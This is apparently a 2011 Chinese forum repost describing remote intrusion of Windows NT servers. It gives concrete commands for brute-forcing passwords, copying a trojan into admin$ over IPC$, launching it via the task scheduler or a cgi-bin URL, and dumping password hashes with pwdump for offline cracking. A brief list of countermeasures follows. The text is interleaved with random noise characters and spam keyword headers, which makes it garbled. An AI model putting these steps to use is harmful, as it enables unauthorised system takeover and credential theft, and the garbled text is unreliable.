天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

  • 
    
    <delect id="ixd07"></delect>

      汶上信息港

      標題: 遠程入侵NT ----spp(低音炮) [打印本頁]

      作者: 雜七雜八    時間: 2011-1-12 16:31
      標題: 遠程入侵NT ----spp(低音炮)
      看了篇文章介紹使用netbus 或 netspy 遠程入侵nt系統(tǒng),感覺真是。。看來nt系統(tǒng)的共享機制如果不配合火墻使用,SMB會給你造成很大麻煩。?!∵B小小 只的木馬都可以讓nt管理員頭大。 4 s5 d8 Z: O9 y4 v- _
          其攻擊過程如下: ' c0 e- Z+ U( }( D- R. {0 E) Q! \* A
      1、使用掃描工具查找NT主機      
      * e! F: j, ]+ Z2 、確定攻擊目標后,使用letmein 對目標主機進行攻擊, 如: 5 E7 M9 T( p! i/ o5 m, y$ M
      letmein file://x.x.x.x/ -all -g mypwd (對\\x.x.x.x上所有用戶攻擊)
      " {6 A& q' `" K  }3 I& n" ^letmein file://x.x.x.x/ -admin -g mypwd (對\\x.x.x.x上管理員攻擊)
      ' @" q' W8 D% Fletmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶)
      0 ?% X2 [1 }: h- L3 G3 \注:- 確定目標后,收集目標信息并嘗試取得非法資源
      % d7 k# R- J! J4 A% l( S4 H* `: ]0 C3、當letmein 獲取相關管理員權限后,使用ms提供的合法命令:
      , {2 R4 J: [/ c- n5 _, Inet use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠程資源并將木馬拷入遠程 $ d4 a0 g8 m+ s) Y5 D9 D' _/ S
      copy x:\netserver.exe \\x.x.x.x\admin$\system32
      7 A7 j  Z# _% @4、使用合法ms命令遠程啟動木馬服務: : @3 s5 M) I3 F" L* `- q
      netsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg & @0 k3 _7 i  d+ }) f' ?9 {7 }7 u

      ) \: g) K2 D% J   該方法有其巧妙之處。。利用nt的任務計劃管理,在特定時候啟動木馬服務 / m6 x4 C2 ]6 _) p
      5 U2 B3 x$ P& j  H
         另一種方法: 8 `8 S1 ?0 r% @8 H( ~
         將ntsrver.exe 或其他運行程序Copy到目的服務器的www可執(zhí)行目錄, 如cgi-bin或scripts,然后在瀏覽器鍵入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務將被啟動
      8 ]- {7 p% e& X  ~, z# _
      ) P2 g; Q- B$ {8 k    到此,該次攻擊可以算成功了,遠程資源已在別人控制下。 8 ~+ D+ g, W* d& q1 y, T  E
          如果在遠程使用app redirect 啟動一個cmd.exe到特定端口 , 那么你可以telnet 到該端口,更方便使用該遠程資源 。比如:使用pwdump 將遠程nt上所有用戶和密碼 dump成文件,回傳本地,使用其他工具如l0phtcrack來運算。 分析該次攻擊的整體過程,不難看出,關鍵步驟是letmein取得admin權限,但是很不幸,就目前廈門(有些是省內)的nt服務器管理員而言,密碼對letmein只是多花幾分鐘而已。我對某些大的公共平臺服務器進行掃描的結果,除了solaris和linux系統(tǒng)之外,其余的nt被letmein猜中率有75%以上。而且在這些被進入的機器上,SMB都有在tcp/ip上 跑,有兩臺有配備火墻,但是沒有封閉對外137-139口。
      5 E" x# k) Q( R: |* c6 G, ?: d5 T9 v4 U+ W+ n4 o
           對策:
      & C5 Q9 q' j, }. [( F& @; X1、還是老話,密碼的選擇問題,使用向..@2KjsfiM7v!09..這樣的密碼會讓任何使用 暴力法計算的機器算到cpu燒掉。 , M* ~: M) T: h+ z6 p
      2、nt網絡的適當配置,不要在對外的nc綁定共享服務是個好習慣,特別是tcp/ip協(xié)議。 : o7 x! y2 g- r2 `( O. v
      3、防火墻的配置,屏蔽一切不需要的服務端口,象netebui在tcp/ip上的137-139口,開這些口只會使你的系統(tǒng)處于危險的處境,如果非要在遠程使用這些口的服務,建議使用其他軟件來代替。 1 m' T* m" O. b2 F
      4、及時檢查日記和監(jiān)控服務的運行,定時對文件系統(tǒng)的權限受托關系進行檢查。 , U0 }' T2 s/ y9 _( f1 x
      5、管理人員素質的提高,安全風險意思加強無疑對你管理的系統(tǒng)有很多好處。 -- SPP 10Hz的低頻 你聽不到的聲音卻無時不刻在影響著你 。
      ) j  V! w# x; g0 a




      歡迎光臨 汶上信息港 (http://vancelump.com/) Powered by Discuz! X3.5